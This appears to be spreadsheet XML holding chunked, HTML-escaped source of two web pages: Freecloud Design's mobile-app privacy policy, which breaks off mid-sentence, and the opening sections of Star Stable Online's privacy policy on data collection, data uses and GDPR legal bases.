    <t>name="msapplication-task" content="name=Sign up for a free blog;action-uri=http://wordpress.com/signup/;icon-uri=https://s1.wp.com/i/favicon.ico" /&gt;&lt;meta name="msapplication-task" content="name=WordPress.com Support;action-uri=http://support.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /&gt;&lt;meta name="msapplication-task" content="name=WordPress.com Forums;action-uri=http://forums.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /&gt;&lt;meta name="description" content="Privacy Policy for Mobile/Computer Apps Overview: This privacy policy explains how Freecloud Design, Inc. collects and uses information in our mobile apps and how this information is used.</t>
  </si>
  <si>
    <t>Personally Identifiable Information: Players can create player profiles in the game and give them a name.   The profile name entered and the player&amp;#039;s game progress is only&amp;hellip;" /&gt;
&lt;!-- Your Google Analytics Plugin is missing the tracking ID --&gt;_x005F_x000D_
&lt;/head&gt;
&lt;body class="page-template-default page page-id-692 customizer-styles-applied two-column content-sidebar highlander-enabled highlander-light"&gt;
&lt;div id="container" class="hfeed contain"&gt;
	&lt;div id="header"&gt;
		&lt;div id="masthead" role="banner"&gt;
						&lt;div id="site-title"&gt;
				&lt;span&gt;
					&lt;a href="https://dan-russell-pinson.com/" title="Dan</t>
  </si>
  <si>
    <t>Russell-Pinson" rel="home"&gt;Dan Russell-Pinson&lt;/a&gt;
				&lt;/span&gt;
			 &lt;/div&gt;
			&lt;div id="site-description"&gt;Games, Art, Photography and more&amp;#8230;&lt;/div&gt;
		&lt;/div&gt;&lt;!-- #masthead --&gt;
		&lt;div id="access" role="navigation"&gt;
		  			&lt;div class="skip-link screen-reader-text"&gt;&lt;a href="#content" title="Skip to content"&gt;Skip to content&lt;/a&gt;&lt;/div&gt;
						&lt;div class="menu"&gt;&lt;ul&gt;
&lt;li &gt;&lt;a href="https://dan-russell-pinson.com/"&gt;Home&lt;/a&gt;&lt;/li&gt;&lt;li class="page_item page-item-323"&gt;&lt;a href="https://dan-russell-pinson.com/my-games/"&gt;My Games&lt;/a&gt;&lt;/li&gt;
&lt;li class="page_item page-item-2"&gt;&lt;a href="https://dan-russell-pinson.com/about/"&gt;About&lt;/a&gt;&lt;/li&gt;
&lt;li class="page_item page-item-21"&gt;&lt;a href="https://dan-russell-pinson.com/contact/"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;li class="page_item page-item-692 current_page_item"&gt;&lt;a href="https://dan-russell-pinson.com/privacy/" aria-current="page"&gt;Privacy&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
		&lt;/div&gt;&lt;!-- #access --&gt;
		&lt;div id="branding"&gt;
						&lt;a href="https://dan-russell-pinson.com/"&gt;
									&lt;img src="https://danrussellpinson.files.wordpress.com/2012/01/blogheader3.jpg" width="990" height="180" alt="" /&gt;
							&lt;/a&gt;
					&lt;/div&gt;&lt;!-- #branding --&gt;
	&lt;/div&gt;&lt;!-- #header --&gt;
	&lt;div id="content-box"&gt;
&lt;div id="content-container"&gt;
	&lt;div id="content" role="main"&gt;
		&lt;div id="post-692" class="post-692 page type-page status-publish hentry"&gt;
			&lt;h1 class="entry-title"&gt;Privacy&lt;/h1&gt;
			&lt;div class="entry-content"&gt;
				&lt;p&gt;&lt;strong&gt;Privacy Policy for Mobile/Computer Apps&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Overview:&lt;br /&gt;
&lt;/strong&gt;</t>
  </si>
  <si>
    <t>This privacy policy explains how Freecloud Design, Inc. collects and uses information in our mobile apps and how this information is used.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Personally Identifiable Information:&lt;br /&gt;
&lt;/strong&gt;Players can create player profiles in the game and give them a name.   The profile name entered and the player&amp;#8217;s game progress is only stored locally on the device.&lt;/p&gt;
&lt;p&gt; We do not collect personally identifiable information about you.</t>
  </si>
  <si>
    <t>In other words, we do not collect information such as your full name, address, phone number or email address.&lt;/p&gt;
&lt;p&gt;We do not knowingly contact or collect personal information from children under 13. If you believe we have inadvertently collected such information, please contact us so we can promptly obtain parental consent or remove the information.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Location Information:&lt;br /&gt;
&lt;/strong&gt;We do not use or collect your precise geographic location.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Access to personal data:&lt;br /&gt;
&lt;/strong&gt; The only data collected from the user is their player profile name and it is only stored locally on the device.</t>
  </si>
  <si>
    <t>This player profile can be viewed and/or deleted inside the app.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sharing of information:&lt;br /&gt;
&lt;/strong&gt;We generally do not share personally identifiable information (such as name, address, email or phone) with other companies.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ad Companies:&lt;br /&gt;
&lt;/strong&gt;We do not allow advertising companies t</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en"&gt;&lt;head&gt;&lt;meta charSet="utf-8" /&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=5.0" /&gt;&lt;meta http-equiv="X-UA-Compatible" content="IE=Edge" /&gt;&lt;meta name="yandex-verification" content="70ed091519a85b0a" /&gt;&lt;meta name="google-site-verification" content="bmLAh9tJSXjh3UB_lDpdBqbaExpn_0dR3t_IreeHW48" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" href="https://starstable.com/da/privacy" hrefLang="da" /&gt;&lt;link rel="alternate" href="https://starstable.com/de/privacy" hrefLang="de" /&gt;&lt;link rel="alternate" href="https://starstable.com/es/privacy" hrefLang="es" /&gt;&lt;link rel="alternate" href="https://starstable.com/fi/privacy" hrefLang="fi" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" href="https://starstable.com/fr/privacy" hrefLang="fr" /&gt;&lt;link rel="alternate" href="https://starstable.com/hu/privacy" hrefLang="hu" /&gt;&lt;link rel="alternate" href="https://starstable.com/it/privacy" hrefLang="it" /&gt;&lt;link rel="alternate" href="https://starstable.com/nl/privacy" hrefLang="nl" /&gt;&lt;link rel="alternate" href="https://starstable.com/no/privacy" hrefLang="no" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" href="https://starstable.com/pl/privacy" hrefLang="pl" /&gt;&lt;link rel="alternate" href="https://starstable.com/pt/privacy" hrefLang="pt" /&gt;&lt;link rel="alternate" href="https://starstable.com/ru/privacy" hrefLang="ru" /&gt;&lt;link rel="alternate" href="https://starstable.com/se/privacy" hrefLang="se" /&gt;&lt;meta name="robots" content="noindex, nofollow" /&gt;&lt;title&gt;Privacy policy | Star Stable&lt;/title&gt;&lt;meta property="og:title" content="Privacy policy" /&gt;&lt;meta name="twitter:title" content="Privacy policy" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>name="description" content="This privacy policy applies to the online game and interactions contained in Star Stable Online available at https://www.starstable.com, as well as any services provided by Star Stable relating to the game: Star Stable website, mobile apps “services” and from different international variations. " /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:description" content="This privacy policy applies to the online game and interactions contained in Star Stable Online available at https://www.starstable.com, as well as any services provided by Star Stable relating to the game: Star Stable website, mobile apps “services” and from different international variations. " /&gt;&lt;meta name="twitter:description" content="This privacy policy applies to the online game and interactions contained in Star Stable Online available at https://www.starstable.com, as well as any services provided by Star Stable relating to the game: Star Stable website, mobile apps “services” and from different international variations. "</t>
  </si>
  <si>
    <t>/&gt;&lt;meta property="og:image" content="https://www.datocms-assets.com/65346/1648052887-ssom.webp?auto=format&amp;amp;fit=max&amp;amp;w=1200" /&gt;&lt;meta property="og:image:alt" content="ssom" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>name="twitter:image" content="https://www.datocms-assets.com/65346/1648052887-ssom.webp?auto=format&amp;amp;fit=max&amp;amp;w=1200" /&gt;&lt;meta name="twitter:image:alt" content="ssom" /&gt;&lt;meta property="og:locale" content="en" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:type" content="article" /&gt;&lt;meta property="og:site_name" content="Star Stable" /&gt;&lt;meta property="article:modified_time" content="2022-11-14T15:21:29Z" /&gt;&lt;meta property="article:publisher" content="http://www.facebook.com/starstable" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>name="twitter:card" content="summary_large_image" /&gt;&lt;meta name="twitter:site" content="@starstable" /&gt;&lt;link rel="icon" type="image/png" sizes="32x32" href="/_assets/favicon-32x32.png" /&gt;&lt;link rel="icon" type="image/png" sizes="16x16" href="/_assets/favicon-16x16.png" /&gt;&lt;link rel="apple-touch-icon" sizes="180x180" href="/_assets/apple-touch-icon.png" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="manifest" href="/_assets/site.webmanifest" /&gt;&lt;link rel="mask-icon" href="/_assets/safari-pinned-tab.svg" color="#5bbad5" /&gt;&lt;meta name="next-head-count" content="41" /&gt;&lt;link rel="preload" href="/_next/static/css/36fc8b26731d5bb8.css" as="style" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="stylesheet" href="/_next/static/css/36fc8b26731d5bb8.css" data-n-g="" /&gt;&lt;noscript data-n-css=""&gt;&lt;/noscript&gt;&lt;script defer="" nomodule="" src="/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"&gt;&lt;/script&gt;&lt;script defer="" src="/_next/static/chunks/6562-0593c9404514a77e.js"&gt;&lt;/script&gt;&lt;script defer="" src="/_next/static/chunks/10.f1a9e11423bb3742.js"&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/webpack-df4b875c6000b7ba.js" defer=""&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/framework-07d8ad7bc1f1e73b.js" defer=""&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/main-39f4d5dae73e0039.js" defer=""&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/pages/_app-ee2a2881f9825665.js" defer=""&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/6051-d829bea605a2e819.js" defer=""&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/pages/%5B...slug%5D-0b407d3466b0d6f8.js" defer=""&gt;&lt;/script&gt;&lt;script src="/_next/static/9vy15scLlELazMLQQ_YrA/_buildManifest.js" defer=""&gt;&lt;/script&gt;&lt;script src="/_next/static/9vy15scLlELazMLQQ_YrA/_ssgManifest.js" defer=""&gt;&lt;/script&gt;&lt;style data-styled="" data-styled-version="5.3.9"&gt;@font-face{font-family:'Fugaz One';font-style:normal;font-display:swap;src:url('/_assets/fonts/fugaz/fugaz-one-regular.woff2') format('woff2'), url('/_assets/fonts/fugaz/fugaz-one-regular.woff') format('woff'), url('/_assets/fonts/fugaz/fugaz-one-regular.ttf') format('truetype');}/*!sc*/
@font-face{font-family:'Noto Sans';font-weight:normal;font-display:swap;src:url('/_assets/fonts/noto-sans/NotoSans-Regular.woff') format('woff');}/*!sc*/
@font-face{font-family:'Noto Sans';font-weight:bold;font-display:swap;src:url('/_assets/fonts/noto-sans/NotoSans-Bold.woff') format('woff');}/*!sc*/
*,*::before,*::after{box-sizing:border-box;}/*!sc*/
html{-webkit-scroll-behavior:smooth;-moz-scroll-behavior:smooth;-ms-scroll-behavior:smooth;scroll-behavior:smooth;}/*!sc*/
html,body{font-family:"Noto Sans";padding:0;margin:0;font-size:16px;color:#231E1E;}/*!sc*/
html .banner-actions-container button,body .banner-actions-container button{width:100% ! important;}/*!sc*/
html .banner-actions-container button,body .banner-actions-container button{width:100% ! important;}/*!sc*/
html h1,body h1,html h2,body h2,html h3,body h3,html h4,body h4,html h5,body h5,html h6,body h6{font-weight:normal;margin:0;font-family:"Fugaz One",proxima_novabold,helvetica neue,Arial,Helvetica,sans-serif;}/*!sc*/
html h1:lang(ru),body h1:</t>
  </si>
  <si>
    <t>lang(ru),html h2:lang(ru),body h2:lang(ru),html h3:lang(ru),body h3:lang(ru),html h4:lang(ru),body h4:lang(ru),html h5:lang(ru),body h5: lang(ru),html h6:lang(ru),body h6:lang(ru),html h1:lang(pl),body h1:lang(pl),html h2:lang(pl),body h2:lang(pl),html h3:lang(pl),body h3:lang(pl),html h4:lang(pl),body h4:lang(pl),html h5:lang(pl),body h5: lang(pl),html h6:lang(pl),body h6:lang(pl),html h1:lang(hu),body h1:lang(hu),html h2:lang(hu),body h2:lang(hu),html h3:lang(hu),body h3:lang(hu),html h4:lang(hu),body h4:lang(hu),html h5:lang(hu),body h5:lang(hu),html h6:lang(hu),body h6:lang(hu){font-family:'Noto Sans',proxima_novabold,helvetica neue,Arial,Helvetica, sans-serif;font-weight:bold;font-style:italic;}/*!sc*/
html .swiper-pagination-bullet,body .swiper-pagination-bullet{background-color:#382114 !important;display:inline-block;width:0.75rem;height:0.75rem;}/*!sc*/
html .swiper-pagination-bullet-active-next,body .swiper-pagination-bullet-active-next,html .swiper-pagination-bullet-active-next-next,body .swiper-pagination-bullet-active-next-next{background-color:white !</t>
  </si>
  <si>
    <t>important;opacity:0.8;}/*!sc*/
html .swiper-pagination-bullet-active-prev,body .swiper-pagination-bullet-active-prev,html .swiper-pagination-bullet-active-prev-prev,body .swiper-pagination-bullet-active-prev-prev{background-color:white ! important;opacity:0.8;}/*!sc*/
@media only screen and (max-width:620px){html h1,body h1{font-size:3.375rem ! important;line-height:3.8rem !</t>
  </si>
  <si>
    <t>important;}html h2,body h2{font-size:2.125rem ! important;line-height:2.5rem ! important;}html h3,body</t>
  </si>
  <si>
    <t>h3{font-size:1.75rem ! important;line-height:2rem ! important;}html h4,body h4{font-size:1.25rem !important;line-height:1.5rem !</t>
  </si>
  <si>
    <t>important;}html h5,body h5{font-size:1rem ! important;line-height:1rem !important;}}/*!sc*/
 @media (prefers-reduced-motion){html</t>
  </si>
  <si>
    <t>[data-aos],body [data-aos],html [data-aos^=fade],body [data-aos^=fade],html [data-aos^=fade][data-aos^=fade],body</t>
  </si>
  <si>
    <t>[data-aos^=fade][data-aos^=fade]{visibility:visible;opacity:1;-webkit-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0);transform:translate3d(0,0,0);}}/*!sc*/
data-styled.g1[id="sc-global-hjjMWy1"]{content:"sc-global-hjjMWy1,"}/*!sc*/
.hpwBrv{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;}/*!sc*/
.hpwBrv &gt; *{margin-top:calc(1rem / 2);margin-bottom:calc(1rem / 2);}/*!sc*/
data-styled.g2[id="sc-7c6fbc8e-0"]{content:"hpwBrv,"}/*!sc*/
.hWA-DHC{display:grid;grid-gap:1.5rem;}/*!sc*/
data-styled.g3[id="sc-7c6fbc8e-1"]{content:"hWA-DHC,"}/*!sc*/
.hwmnAu{position:absolute;top:0;height:98px;width:100%;background-color:#231E1E;}/*!sc*/
data-styled.g9[id="sc-d3a2b728-1"]{content:"hwmnAu,"}/*!sc*/
.fKwIMD{position:fixed;z-index:9999;visibility:hidden;}/*!sc*/
data-styled.g20[id="sc-3d467c0e-0"]{content:"fKwIMD,"}/*!sc*/
.hbIbvD{z-index:1;position:relative;width:100vw;background-color:#fbf7f5;min-height:calc(100vh - 335px - 30px - 68px);margin-top:68px;}/*!sc*/
@media only screen and (min-width:1079px){.hbIbvD{margin-top:calc(30px + 68px);}}/*!sc*/
data-styled.g21[id="sc-3bd6013c-0"]{content:"hbIbvD,"}/*!sc*/
.ljxZZi{color:black;text-align:left;font-size:6.25rem;line-height:7rem;}/*!sc*/
data-styled.g25[id="sc-15d1df69-0"]{content:"ljxZZi,"}/*!sc*/
.laMDKv{color:black;text-align:left;line-height:3.825rem;font-size:3.625rem;}/*!sc*/
data-styled.g26[id="sc-15d1df69-1"]{content:"laMDKv,"}/*!sc*/
.jSdxHY{color:black;text-align:left;font-size:2.625rem;line-height:2.625rem;}/*!sc*/
data-styled.g27[id="sc-15d1df69-2"]{content:"jSdxHY,"}/*!sc*/
.iOUcVT{-webkit-transition:all 0.2s ease;transition:all 0.2s ease;-webkit-text-decoration:inherit;text-decoration:inherit;font-weight:inherit;display:inline;color:#a5248e;}/*!sc*/
.iOUcVT:hover{color:#e53bb9;}/*!sc*/
data-styled.g63[id="sc-4cf6d55c-0"]{content:"iOUcVT,"}/*!sc*/
.fsEJJk{margin:0 auto;max-width:1400px;padding:24px;grid-template-columns:1fr;}/*!sc*/
@media only screen and (min-width:768px){.fsEJJk{grid-template-columns:285px 1fr;}}/*!sc*/
data-styled.g89[id="sc-d9603ffd-0"]{content:"fsEJJk,"}/*!sc*/
.kbwnAl{overflow:hidden;overflow-wrap:break-word;}/*!sc*/
@media only screen and (max-width:620px){.kbwnAl h1{font-size:2.5rem ! important;line-height:3rem !</t>
  </si>
  <si>
    <t>important;}.kbwnAl h2{font-size:1.75rem ! important;line-height:2.2rem ! important;}.kbwnAl h3{font-size:1.5rem !</t>
  </si>
  <si>
    <t>important;line-height:2rem ! important;}.kbwnAl h4{font-size:1.25rem !important;line-height:1.5rem !important;}}/*!sc*/
 .kbwnAl</t>
  </si>
  <si>
    <t>h1{font-size:2.5rem ! important;line-height:3rem ! important;}/*!sc*/
.kbwnAl</t>
  </si>
  <si>
    <t>h2{font-size:1.75rem ! important;line-height:2.2rem ! important;}/*!sc*/
.kbwnAl h3{font-size:1.5rem !</t>
  </si>
  <si>
    <t>important;line-height:2rem ! important;}/*!sc*/
.kbwnAl h4{font-size:1.25rem !important;line-height:1.5rem !</t>
  </si>
  <si>
    <t>important;}/*!sc*/
.kbwnAl h1{margin:2.5rem 0;}/*!sc*/
.kbwnAl hr{margin:2rem 0;}/*!sc*/
data-styled.g90[id="sc-d9603ffd-1"]{content:"kbwnAl,"}/*!sc*/
.cbuJlm{display:none !</t>
  </si>
  <si>
    <t>important;position:-webkit-sticky;position:sticky;top:120px;border-radius:20px;color:#39117d;margin-top:2.5rem;background-color:#e4e4ff;padding:30px;-webkit-align-self:start;-ms-flex-item-align:start;align-self:start;max-height:600px;overflow:scroll;}/*!sc*/
.cbuJlm h2{margin:0;}/*!sc*/
.cbuJlm a{font-weight:bold;-webkit-text-decoration:none;text-decoration:none;color:inherit;}/*!sc*/
.cbuJlm a:hover{color:#7749de;}/*!sc*/
@media only screen and (min-width:768px){.cbuJlm{display:-webkit-box ! important;display:-webkit-flex !important;display:-ms-flexbox !</t>
  </si>
  <si>
    <t>important;display:flex !important;}}/*!sc*/
data-styled.g91[id="sc-d9ccefd8-0"]{content:"cbuJlm,"}/*!sc*/
&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;div id="__next"&gt;&lt;noscript&gt;&lt;style&gt;[data-aos] { opacity: 1 !important; transform: none !important; }&lt;/style&gt;&lt;/noscript&gt;&lt;div class="sc-3d467c0e-0 fKwIMD"&gt;&lt;div id="recaptcha-container"&gt;&lt;/div&gt;&lt;/div&gt;&lt;header class="sc-d3a2b728-1 hwmnAu"&gt;&lt;/header&gt;&lt;div class="sc-3bd6013c-0</t>
  </si>
  <si>
    <t>hbIbvD"&gt;&lt;div class="sc-7c6fbc8e-1 sc-d9603ffd-0 hWA-DHC fsEJJk"&gt;&lt;div direction="column" class="sc-7c6fbc8e-0 sc-d9ccefd8-0 hpwBrv cbuJlm"&gt;&lt;h3 color="black" class="sc-15d1df69-2 jSdxHY"&gt;Contents&lt;/h3&gt;&lt;a href="#1-our-privacy-policy"&gt;1. Our Privacy Policy&lt;/a&gt;&lt;a href="#2-the-data-we-collect"&gt;2. The data we collect&lt;/a&gt;&lt;a href="#3-what-do-we-use-the-data-for"&gt;3.</t>
  </si>
  <si>
    <t>What do we use the data for?&lt;/a&gt;&lt;a href="#4-how-long-do-we-keep-the-data"&gt;4. How long do we keep the data?&lt;/a&gt;&lt;a href="#5-how-do-we-handle-your-data-rights-at-star-stable"&gt;5. How do we handle your data rights at Star Stable?&lt;/a&gt;&lt;a href="#51-can-i-correct-the-information-you-have-about-me"&gt;5.1 Can I correct the information you have about me?&lt;/a&gt;&lt;a</t>
  </si>
  <si>
    <t>href="#52-can-i-withdraw-my-consent-and-restrict-data-processing-of-my-personal-data"&gt;5.2 Can I withdraw my consent and restrict data processing of my personal data?&lt;/a&gt;&lt;a href="#53-can-i-request-information-or-ask-for-my-personal-data-to-be-deleted"&gt;5.3 Can I request information or ask for my personal data to be deleted?&lt;/a&gt;&lt;a href="#54-can-i-move-my-data"&gt;5.4 Can I move my data&lt;/a&gt;&lt;a href="#6-community-or-social-features-we-offer-and-how-we-keep-these-areas-safe"&gt;6.</t>
  </si>
  <si>
    <t>Community or social features we offer and how we keep these areas safe.&lt;/a&gt;&lt;a href="#7-with-whom-do-we-share-your-information"&gt;7. With whom do we share your information?&lt;/a&gt;&lt;a href="#8-how-do-we-keep-your-information-secure"&gt;8. How do we keep your information secure?&lt;/a&gt;&lt;a href="#9-information-collected-from-children"&gt;9.</t>
  </si>
  <si>
    <t>Information collected from children &lt;/a&gt;&lt;a href="#10-how-can-you-contact-us-with-privacy-questions-or-concerns"&gt;10. How can you Contact us with Privacy Questions or Concerns?&lt;/a&gt;&lt;/div&gt;&lt;div class="sc-d9603ffd-1 kbwnAl"&gt;&lt;h1 color="black" class="sc-15d1df69-0 ljxZZi"&gt;Privacy Policy&lt;/h1&gt;&lt;p&gt;&lt;em&gt;Valid from February 17, 2022 for all new players and from March 10, 2022 for all existing players&lt;/em&gt;&lt;/p&gt;&lt;p&gt;Star Stable is an online horse game for players of all ages all over the world, where they can dive into the joys of riding and adventure.</t>
  </si>
  <si>
    <t>Star Stable Online is a product owned and developed by Star Stable Entertainment AB in Stockholm, Sweden. &lt;/p&gt;&lt;p &gt;This privacy policy applies to the online game and interactions contained in Star Stable Online available at &lt;a href="https://www.starstable.com" class="sc-4cf6d55c-0 iOUcVT"&gt;&lt;u&gt;https://www.starstable.com&lt;/u&gt;&lt;/a&gt; and the mobile app version of Star Stable Online. The policy also applies to any services provided by Star Stable relating to the game, including Star Stable websites and mobile apps Star Stable Friends and Star Stable Horses.</t>
  </si>
  <si>
    <t>This privacy policy does not apply to third party companies or to sites which may link, or redirect, to Star Stable Entertainment AB sites or products.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Our privacy policy may change and be updated from time to time. If the change significantly affects registered users, we will send a notice to you or to your parent or legal guardian by e-mail and, where required, obtain your prior consent or the prior consent of your parent or legal guardian.&lt;/p&gt;&lt;hr /&gt;&lt;p&gt;&lt;/p&gt;&lt;h2 color="black" style="scroll-margin:115px" id="1-our-privacy-policy" class="sc-15d1df69-1 laMDKv"&gt;1. Our Privacy Policy&lt;/h2&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Your personal data is data that identifies you as an individual and Star Stable appreciates that you rely on us to keep it safe.</t>
  </si>
  <si>
    <t>We constantly strive to earn the trust of our players and parents or legal guardians. You have control over your data and can manage how it is used in accordance with section 5 below.&lt;/p&gt;&lt;hr /&gt;&lt;p&gt;&lt;/p&gt;&lt;h2 color="black" style="scroll-margin:115px" id="2-the-data-we-collect" class="sc-15d1df69-1 laMDKv"&gt;2. The data we collect&lt;/h2&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;We require users to register an account to play Star Stable Online.</t>
  </si>
  <si>
    <t>Star Stable will not collect more personal data than is reasonably required to provide a technically stable and safe online game experience.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;When you register for an account and play the game, Star Stable will collect the following data:&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt; Player email address&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; Parent email address where applicable&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; Purchase data/history&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; Customer ID and data, such as user name and date of birth &lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; Account data, such as in-game data, game progress, achievements, time spent playing and in-game communications&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; IP address and log in details&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; Technical information about your device, including device identifiers and cookie data&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr /&gt;&lt;p&gt;&lt;/p&gt;&lt;h2 color="black" style="scroll-margin:115px" id="3-what-do-we-use-the-data-for" class="sc-15d1df69-1 laMDKv"&gt;3. What do we use the data for?&lt;/h2&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt; The reason Star Stable store player’s personal data is:&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>So that we can create your unique account profile and use and share your account details amongst the various Star Stable products and services.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; To identify which country you are in, so that we know which laws and regulations apply to you.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; To identify the consent age in your area, so that we can help you to get parental/ legal guardian approval if needed.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; To make sure that you get the right version of the game for your country.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; So that you can get access to the site and game, in order to progress and get the best possible game experience.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; So that we can communicate with you about your account.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>So that we can send you news via e-mail, push notifications or other methods, if you have opted for this.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; For us to reach you regarding marketing offers via e-mail, push notifications or other methods, including sending you tailored marketing offers based on your player profile and in-game data, if you have opted for this, or your parent opted-in on your behalf.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; To help us troubleshoot crashes and improve the functionality of the game and our products and services, as well as to personalize your game experience, save your preferences, authenticate our users, and provide similar user-experience features.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; To help us detect and prevent misuse or fraud, keep our games fair for all users, and otherwise protect and defend our users, products and services.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; So that we can measure and analyse how our products and services are used for statistical and analytical purposes and for serving, attributing, and otherwise analysing the effectiveness of our ads. &lt;</t>
  </si>
  <si>
    <t>/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; For password maintenance.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt; The reason we store personal data for you as a parent or legal guardian:&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt; To set up your payment method when you start a membership.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; To allow future payments processes.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; To maintain your consent history.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; To store your billing address for future payments.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt; To store your email address so that we can communicate with you about your child’s account.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>For us to reach you regarding marketing offers, if you have opted for this. &lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt; Actual credit card or payment data is not stored by Star Stable but by our international-hosted payment providers. To be able to store information of this nature, we only use regulated providers who provide high level of security.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;We use cookies and similar technologies in order to (i) provide and maintain the functionality of our services, (ii) measure and analyse how our services are used, and (iii) serve ads and help us measure their effectiveness.</t>
  </si>
  <si>
    <t>You can find additional information on such use in our Cookie Policy and we may give you the option to accept or reject our use of certain cookies and similar technologies. You can read our &lt;a href="http://www.starstable.com/cookie-policy" class="sc-4cf6d55c-0 iOUcVT"&gt;Cookie Policy here.&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Under the General Data Protection Regulation (GDPR), the lawful bases we rely on for processing your information are:&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;a) We need the information for the performance of the contract with you, including to provide our products and services:&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;b) We need the information for compliance with a legal obligation;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;c) Your consent, where we have asked for and obtained such consent from you.</t>
  </si>
  <si>
    <t>You are able to remove your consent at any time. You can do this by contacting &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="fc8c8e958a9d9f85bc8f889d8e8f889d9e9099d29f9391"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;d) We have a legitimate interest to process the information for business purposes described above and provided that our interest is not overridden by your right to privacy and protection of your personal data.&lt;/p&gt;&lt;hr /&gt;&lt;p&gt;&lt;/p&gt;&lt;h2 color="black" style="scroll-margin:115px" id="4-how-long-do-we-keep-the-data" class="sc-15d1df69-1 laMDKv"&gt;4.</t>
  </si>
  <si>
